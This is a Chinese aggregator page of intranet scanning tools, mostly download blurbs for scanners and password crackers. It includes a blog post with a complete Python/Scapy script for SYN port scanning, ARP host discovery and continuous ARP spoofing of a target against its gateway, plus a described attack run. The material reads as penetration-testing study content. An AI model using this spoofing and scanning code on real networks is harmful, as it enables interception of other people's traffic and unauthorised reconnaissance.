精华内容
下载资源
问答
  • 内网扫描工具

    2018-09-25 14:47:47
    在渗透测试(特别是内网)中经常需要对目标进行网络资产收集,即对方服务器都有哪些IP,IP上开了哪些端口,端口上运行着哪些服务,此脚本即为实现此过程,相比其他探测脚本有以下优点:1、轻巧简洁,只需python环境,...
  • 一款内网扫描工具,方便一键大保健。支持主机存活探测,端口扫描,常见服务的爆破,ms17010,redis批量写私钥,计划任务回弹,读取win网卡信息,网络中断扫描等。趁着最近有空,用go把f-scrack插入一遍遍。使用go来...
  • 一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。 支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、...

    工具地址:https://github.com/shadow1ng/fscan

    工具描述:

    一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
    支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。

    展开全文
  • 网络安全-渗透提权-内网扫描工具 -RASscan 资源已上传至☞:https://download.csdn.net/download/weixin_43510203/12543349

    网络安全-渗透提权-内网扫描工具 -RASscan

    资源已上传至☞:https://download.csdn.net/download/weixin_43510203/12543349

    展开全文
  • 内网端口扫描工具.zip

    2020-07-18 22:37:26
    这是一款用于检测内网设备端口开放的工具,工作中用来检测并封堵端口做安全加固非常有用,有需要的同学可下载安装使用。小工具,大用途。
  • 内网综合扫描工具.zip

    2021-08-25 23:09:03
    内网扫描工具
  • wnbt 内网扫描工具

    2014-11-24 09:58:58
    wnbt 可以利用扫描存活内网机器服务器
  • 内网弱口令扫描工具

    2019-09-26 11:37:10
    内网弱口令扫描工具
  • 可扫描多网络的所有计算机 扫描共享 功能非常强大的内网扫描工具
  • 企业内网扫描

    2019-01-21 16:11:19
    企业内网扫描器,企业渗透测试判断内网情况/lnsscn。。。
  • Python内网扫描及arp欺骗小工具 运行过程 ip_manager.py 先来看看效果 synscan arping arpspoof 原 攻击 结果 linux windows 完整代码 #! /usr/bin/env python # -*- coding:utf-8 -*- import sys import ...

    Python内网扫描及arp欺骗小工具

    运行过程

    ip_manager.py

    先来看看效果

    synscan
    在这里插入图片描述

    arping

    在这里插入图片描述

    arpspoof


    在这里插入图片描述

    攻击

    在这里插入图片描述

    结果

    linux
    在这里插入图片描述

    windows

    在这里插入图片描述

    完整代码

    #! /usr/bin/env python
    # -*- coding:utf-8 -*-
    
    import sys
    import getopt
    import time
    import netifaces
    from scapy.all import *
    
    target = ""
    scan_type = ""
    port = 0
    gateway = ""
    
    
    # 帮助函数
    def help_message():
        print()
        print("You can manage your ip like this:")
        print("      ip_manager.py -t target_ip -p port --scan_type=type")
        print("[*]example:python ip_manager.py -t 127.0.0.1 -p 7777 --scantype==syn_scan")
        print()
        print("-t    specify the ip you wanna scan")
        print()
        print("-p    specify the port you wanna scan")
        print()
        print("-i    to get host network card information")
        print()
        print("--scan_type= specify the scan type you wanna use")
        print()
        print("scantype:[syn_scan,arp_ping,arp_spoof]")
        print("[*]example:python ip_manager.py -t 127.0.0.1 -p 80 --scan_type=syn_scan ")
    
    # 获取本机网卡信息
    def information():
        print ("Net Card Information:")
        gateway = netifaces.gateways()['default'][2][0]
        nic_name = netifaces.gateways()['default'][2][1]
        for interface in netifaces.interfaces():
            if interface == nic_name:
                ip = netifaces.ifaddresses(nic_name)[2][0]['addr']
                mac_addr = netifaces.ifaddresses(nic_name)[17][0]['addr']
                ip_mask = netifaces.ifaddresses(nic_name)[2][0]['netmask']
        print("Gateway:",gateway)
        print("NIC Name:",nic_name)
        print("NIC MAC Address:",mac_addr)
        print("IPV4 Address:", ip)
        print("IP Netmask:",ip_mask)
        return mac_addr,gateway, nic_name
    
    def main():
        global target
        global scan_type
        global port
        global gateway
        # 解析函数
        try:
            opts, args = getopt.getopt(sys.argv[1:], "t:s:p:hi",
                                       ["target=", "scan_type=", "help","info", "port="])
        except Exception as e:
            print(str(e))
            help_message()
            sys.exit(0)
    
        for opt, value in opts:
            if opt in ["-h", "--help"]:
                help_message()
            elif opt in ["-t", "--target"]:
                target = value
            elif opt in ["-s","--scan_type"]:
                scan_type = value
            elif opt in ["-p", "--port"]:
                port = int(value)
            elif opt in ["-i","--info"]:
                information()
                
        if scan_type == "syn_scan":
            syn_scan()
        elif scan_type == "arp_ping":
            arp_ping()
        elif scan_type == "arp_spoof":
            arp_spoof()
    
    # syn扫描端口
    def syn_scan():
        global target
        global port
        ports = [20,21,22,23,25,69,80,81,109,389,443,1433,1521,2049,3306,3389,5432,8080,27017]
        if port:
            ans, unans = sr(IP(dst = target)/TCP(sport=RandShort(),dport=port),timeout=3)
        else:
            ans, unans = sr(IP(dst = target)/TCP(sport=RandShort(),dport=ports),timeout=3)
        for sent,received in ans:
            if received.haslayer(TCP) and str(received[TCP].flags) == "SA":
                    print("Port " + str(sent[TCP].dport) + " of " + target + " is OPEN!")
            elif received.haslayer(TCP) and str(received[TCP].flags) == "RA":
                    print("Port " + str(sent[TCP].dport) + " of " + target + " is closed!")
            elif received.haslayer(ICMP) and str(received[ICMP].type) == "3":
                    print("Port " + str(sent[TCP].dport) + " of " + target + " is filtered!")
    
        for sent in unans:
            print(str(sent[TCP].dport) + " is unanswered!")
        sys.exit(0)
    
    # arp存活主机扫描
    def arp_ping():
        global target
        ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=target),timeout=3)
        for sent, received in ans:
            print(received[Ether].src+"->"+received[ARP].psrc+" is alive")
        sys.exit(0)
    
    # arp欺骗
    def arp_spoof():
        global target
        mac_addr,gateway, nic_name=information()
        # 获取目标mac地址
        target_mac = getmacbyip(target)
        if target_mac is None:
            print("[-] Error: Could not resolve targets MAC address")
            sys.exit(1)
        print("ARP Spoofing...")
        # 构造响应包
        pkt = Ether(src=mac_addr, dst=target_mac) / ARP(hwsrc=mac_addr, psrc=gateway, hwdst=target_mac, pdst=target)
        while True:
            sendp(pkt, inter=2, iface=nic_name)
    
    if __name__ == "__main__":
        main()
    
    
    
    
    

    参考

    《python黑帽子编程 黑客与渗透测试编程》

    参考链接

    Scapy-port-scanner/port_scanner.py at master · cptpugwash/Scapy-port-scanner · GitHub

    python scapy的用法之ARP主机扫描和ARP欺骗 - 雨中落叶 - 博客园

    展开全文
  • 内网扫描

    2012-01-08 15:43:02
    内网扫描内网扫描
  • Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.7版本内置...

    项目地址:https://github.com/k8gege/Ladon

     

    Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.7版本内置40个功能模块,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、Weblogic、ActiveMQ、Tomcat、Struts2等,密码爆破11种含数据库(Mysql、Oracle、MSSQL)、FTP、SSH(Linux主机)、VNC、Windows密码(IPC、WMI、SMB)、Weblogic后台、Rar压缩包密码等,Web指纹识别模块可识别75种(Web应用、中间件、脚本类型、页面类型)等,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。

    展开全文
  • InScan-开源扫描工具简介本工具只可用于安全性测试,误用于非法用途!工具定位边界打点后的自动化内网工具,完全与服务端脱离。服务端只用于生成poc,网段信息等配置。内网渗透痛点目前已有...
  • 内网渗透扫描器详解

    千次阅读 2019-06-24 14:35:05
    内网渗透扫描器详解 扫描器作用定义 扫描器是一类自动检测本地或远程主机安全弱点的程序,它能够快速的准确的发现扫描目标存在的漏洞并提供给使用者扫描结果。 工作原理是扫描器向目标计算机发送数据包,然后根据...
  • 内网IP扫描工具,快速进行IP扫描

    热门讨论 2010-11-04 06:05:11
    扫描工具针对内网ip进行扫描,针对性强 ,扫描快速准确,喜欢的朋友可以拿去~
  • 之前分享过两款电脑上使用的网络工具,今天分享一个安卓手机上用的。之前的文章可以从下边的链接查看:(文章太长,之前的内容就不保留了,通过下边链接查看)LanSee:【PC工具】更新简单好...
  • IP Scanner Pro mac是一款功能强大的局域网IP扫描工具,IP Scanner Pro扫描本地网络以建立具有IP地址的所有计算机和设备。可以根据需要安排扫描结果。识别设备后,可以为其分配任何名称和图标,以便在常规列表中更...
  • 信息搜集讲过之后,然后就是不得不提的必备工具 Burpsuite工具 首先我们先讲这个必备神奇工具,其他后面在讲! 无论多简单还是多复杂的,一定要多多练习。 1.1 Burpsuite 注:现在有汉化版的,建议小白可以用。 ...
  • 工具几乎不占用系统内存资源,简单易用。适用环境:winNT系统的局域网。 V1.0版—你可以用它: 1.快速搜索并访问本局域网所有可直接访问的共享资源(文件 ,打印机)。 2.对局域网远程主机进行方便的控制和管理(也...
  • Ladon Scanner For Python ...PyLadon 目前python版功能较少,无论在Windows还是Linux系统性能以及速度均也比不上Ladon.exe 唯一的优点是跨平台,后续会添加相关功能...Ladon一款用于大型网络渗透的多线程插件化综合扫描...
  • 三种局域网扫描工具比较

    万次阅读 2018-11-06 08:00:36
    三种局域网扫描工具比较
  • 弱口令扫描工具是一款专业的电脑安全漏洞检测工具。弱口令扫描工具能够自定义进行密码字典探测,能进行安全漏洞检测,还支持插件功能,更能提供图形界面的操作方式,还能扫描远程服务和各种弱口令漏洞,需要的朋友快...
  • 实验一:端口弱口令扫描 实验环境:kali和win3 实验步骤: 利用kali里的九头蛇工具 1.利用nmap查看目标机的端口 2.利用九头蛇hydra工具进行爆破 输入: hydra -L user.txt -P pass.txt 192.168.240.135...
  • 是我用过的最好的局域网ip扫描工具,不仅是ip扫描搜索,所需信息基本都能够扫描出来,不可多得的好工具。
  • 俄罗斯专业扫描工具,挺实用,而且是破解版的,呵呵,大家共享下。
  • 内网MAC扫描管理工具

    2014-11-07 11:45:00
    非常好用的一个MAC扫描器,适合内网管理使用。
  • MS17-010漏洞扫描工具,在公司,或网吧,机器多的可以直接扫描 可直接输入指定的服务器,或客机扫描

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 11,433
精华内容 4,573
关键字:

内网扫描工具